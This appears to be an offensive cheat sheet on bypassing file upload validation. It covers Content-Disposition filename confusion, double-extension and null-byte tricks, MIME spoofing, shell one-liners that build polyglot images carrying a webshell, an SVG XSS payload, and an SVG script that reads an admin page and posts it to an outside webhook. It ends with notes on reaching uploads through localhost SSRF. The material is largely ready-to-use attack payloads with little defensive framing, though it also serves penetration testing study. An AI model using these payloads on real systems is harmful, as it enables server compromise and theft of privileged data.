Unrestricted File Upload

Filename Parameter Confusion (Busboy/OpenResty)

The validator and the storage mechanism look at different parameters in the Content-Disposition header.

• Validator checks: filename

• Storage uses: filename*

Exploit

Content-Disposition: form-data; name="file"; filename="image.png"; filename*=utf-8''attack.svg

Standard Extension Obfuscation

• There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:

Double extensions

.png.php
.jpg.php
.png.asp
.gif.jsp

Null byte injection

file.php%00.jpg
file.asp%00.png

Alternative Executable Extensions

PHP

.php
.php5
.phtml
.pht
.phps
.php3

Microsoft

.asp
.aspx

Java

.jsp
.jspx
.jsw

Bypassing MIME Type Checks

The application checks the Content-Type header in the request, not the actual file content.

Intercept the request and change the header to an allowed type.

Image Types:

Content-Type: image/png
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/svg+xml

Executable types:

Content-Type: application/x-php
Content-Type: application/x-sh
Content-Type: application/x-msdownload
Content-Type: application/x-python-code

Others

Content-Type: text/html
Content-Type: text/plain

Bypassing Content Checks

The server only checks the start of the file.

Create a Polyglot File by combining the Magic Bytes of an image with the code of a webshell.

PNG

echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG

echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF

echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF

echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP

echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

SVG XSS Payloads

Use this to quickly verify if the vulnerability exists.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>

Data Exfiltration (admin panel)

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400">
  <script type="text/javascript">
    fetch('/admin')
      .then(res => res.text())
      .then(html => 
        fetch('https://webhook.site/YOUR-WEBHOOK-ID', {
          method: 'POST',
          body: 'admin_panel=' + btoa(html)
        })
      );
  </script>
</svg>

Accessing Internal Uploads (Localhost SSRF)

Even if the file upload is successful, the file may be inaccessible via the public URL because the application runs on an internal port or the directory isn't mapped to the public web root.

However, leveraging server-side features like admin bots or PDF generators to fetch the file via localhost is essential not just for access, but to execute the payload within a privileged context.

Since these internal features operate from the server's environment, they can bypass network segmentation and access sensitive resources, such as admin panels or internal APIs.

Breaking Down Multipart Parsers: File upload validation bypassSicuranext Blog

List of file signaturesWikipedia

HexEd.it - Browser-based Online and Offline Hex EditingHexEd.it